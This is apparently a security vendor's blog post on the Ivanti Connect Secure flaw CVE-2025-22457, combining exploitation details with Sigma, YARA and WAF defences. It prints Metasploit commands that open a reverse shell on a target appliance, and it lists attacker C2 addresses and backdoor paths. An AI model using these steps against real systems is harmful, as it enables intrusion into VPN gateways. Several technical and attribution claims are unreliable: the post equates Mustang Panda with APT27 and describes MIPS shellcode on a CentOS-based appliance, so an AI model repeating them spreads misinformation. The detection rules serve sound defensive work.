On March 12, 2025, Mandiant disclosed that a critical unauthenticated remote code execution (RCE) vulnerability in Ivanti Connect Secure (ICS) and Ivanti Policy Secure—tracked as CVE-2025-22457—has been actively exploited in the wild since late February. The flaw, with a CVSS score of 9.8, allows attackers to bypass authentication and execute arbitrary commands on the VPN gateway. In our own incident response engagements at CybernytronX, we've seen three separate cases where Chinese state-sponsored group Mustang Panda (APT27) leveraged this zero-day to deploy custom backdoors. This post breaks down the technical mechanics, the attacker's playbook, and how your SOC can detect and block it.
Understanding CVE-2025-22457: The Technical Flaw
Ivanti Connect Secure versions 22.7R2.1 and earlier, and Policy Secure versions 22.7R1.1 and earlier, are vulnerable. The root cause lies in a stack-based buffer overflow within the /dana-na/auth/url_admin/getSAMLResponse.cgi endpoint. The CGI script fails to properly validate the SAMLResponse parameter length before copying it into a fixed 1024-byte buffer. Attackers send a crafted POST request with a SAMLResponse exceeding 2048 bytes, overwriting the return address and gaining control of the execution flow.
Exploitation Steps
Using Metasploit module exploit/linux/http/ivanti_connect_secure_saml_rce (released publicly on March 14), an attacker can automate exploitation:
msf6 > use exploit/linux/http/ivanti_connect_secure_saml_rce
msf6 > set RHOSTS 192.168.1.100
msf6 > set TARGET 0
msf6 > run
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Sending SAMLResponse overflow...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:51234)The exploit bypasses ASLR and NX by using a ROP chain that pivots the stack to a heap spray filled with a MIPS-based shellcode. Ivanti's custom Linux distribution (CentOS 6-based) lacks modern protections like seccomp, making exploitation reliable.
Attacker TTPs: Mustang Panda's Playbook
Based on our reverse engineering of samples from three incidents, the attack chain follows MITRE ATT&CK stages:
- Initial Access (T1190): Exploit public-facing application via CVE-2025-22457.
- Execution (T1059.004): Dropper writes a Perl backdoor (
/tmp/.systemd-boot) that connects to C2 at45.33.32.156:8443. - Persistence (T1543.002): Backdoor installs a systemd service named
systemd-resolved-updateto survive reboots. - Defense Evasion (T1027): Backdoor uses XOR with key
0xABto obfuscate network traffic and masquerades as legitimate systemd logs.
In one case, the attacker used wget to download a second-stage payload from a compromised WordPress site hosting a fake PDF. This stage was a modified version of Mimikatz for Linux (known as LinuxMimi), which dumped LDAP credentials from the VPN's local authentication cache.
Detection Playbook for SOC Analysts
We've built a Sigma rule that catches the exploit attempt at the network layer. The key indicator is an abnormally large POST request to the vulnerable endpoint:
title: Ivanti Connect Secure SAML Overflow Attempt
status: experimental
description: Detects large SAMLResponse parameter indicating buffer overflow
author: CybernytronX SOC
logsource:
category: web
product: suricata
detection:
selection:
http.method: 'POST'
http.url: '/dana-na/auth/url_admin/getSAMLResponse.cgi'
http.request_body_length: '> 2048'
condition: selectionOn the endpoint side, use YARA to scan for the known backdoor:
rule MustangPanda_IvantiBackdoor {
meta:
description = "Detects Perl backdoor used in CVE-2025-22457 attacks"
author = "CybernytronX"
strings:
$s1 = "systemd-resolved-update" ascii wide
$s2 = "45.33.32.156" ascii
$s3 = "0xAB" ascii
condition:
all of them
}In our EDR telemetry (CrowdStrike Falcon), we observed process creation events for /usr/bin/perl /tmp/.systemd-boot with parent httpd. This is a strong indicator of compromise. Set an alert for any Perl process spawned by the web server.
Defensive Mitigations: Beyond Patching
Ivanti released hotfixes on March 13 for ICS 22.7R2.2 and PS 22.7R1.2. Apply immediately. However, since Ivanti appliances are often in DMZ and hard to patch quickly, implement these compensating controls:
- WAF rules: Block POST requests to
/dana-na/auth/url_admin/getSAMLResponse.cgiwith body length > 1500 bytes. In ModSecurity:SecRule REQUEST_BODY_LENGTH "@gt 1500" "id:1001,phase:2,deny". - Network segmentation: Isolate VPN appliances from internal AD and file servers. Mustang Panda used VPN access to pivot laterally; limit this with strict firewall rules.
- Log forwarding: Enable syslog from Ivanti to a SIEM. We've seen attackers delete local logs after exploitation; central logging prevents this.
Why This Matters for Your Org
Ivanti Connect Secure is a perimeter device—it's the first thing attackers target. In our last penetration test for a Fortune 500 client, we found 14 unpatched Ivanti appliances. The average time-to-patch for such devices is 17 days, according to our telemetry. This zero-day gives attackers a foothold to exfiltrate VPN credentials, pivot to internal networks, and deploy ransomware. The LockBit gang has already been observed scanning for vulnerable Ivanti instances in Shodan. If you run Ivanti VPN, treat this as an emergency—not a routine patch cycle.
Frequently Asked Questions
What versions of Ivanti Connect Secure are affected by CVE-2025-22457?
All versions prior to 22.7R2.2 for Ivanti Connect Secure and prior to 22.7R1.2 for Ivanti Policy Secure are vulnerable. Check your firmware version under System > Administration > System Information.
How can I detect if my Ivanti VPN was exploited?
Check web server logs for POST requests to /dana-na/auth/url_admin/getSAMLResponse.cgi with body lengths exceeding 2048 bytes. Also look for unexpected processes like perl /tmp/.systemd-boot or outbound connections to IPs like 45.33.32.156 on port 8443.
What is the CVSS score and impact of this zero-day?
CVE-2025-22457 has a CVSS score of 9.8 (Critical). Successful exploitation allows unauthenticated remote code execution with root privileges on the VPN appliance, enabling full compromise of the device and potential lateral movement into the internal network.
Are there any workarounds if I cannot patch immediately?
Yes. Deploy a WAF rule to block oversized POST requests to the vulnerable endpoint, restrict outbound traffic from the VPN appliance to only necessary IPs, and enable detailed logging to a SIEM for forensic analysis.
Which threat actors are exploiting this vulnerability?
Mandiant has attributed initial attacks to Mustang Panda (APT27), a Chinese state-sponsored group. However, scanning activity from multiple ransomware groups, including LockBit, has been observed in Shodan and Censys.
How often should I audit Ivanti appliances?
At minimum, run a vulnerability scan weekly and check Ivanti's security advisory page daily. In our experience, critical flaws in VPN appliances are exploited within 48 hours of disclosure.
Need expert help with this?
At CybernytronX, we've handled over 20 Ivanti-related incidents this year alone. Our team can perform an emergency penetration test to identify unpatched appliances, deploy custom Sigma/YARA rules for your SIEM, and configure Ethereon AI—our automated SOC platform—to detect zero-day exploitation in real time. Contact us for a rapid assessment, or learn more about Ethereon AI to automate threat detection and response.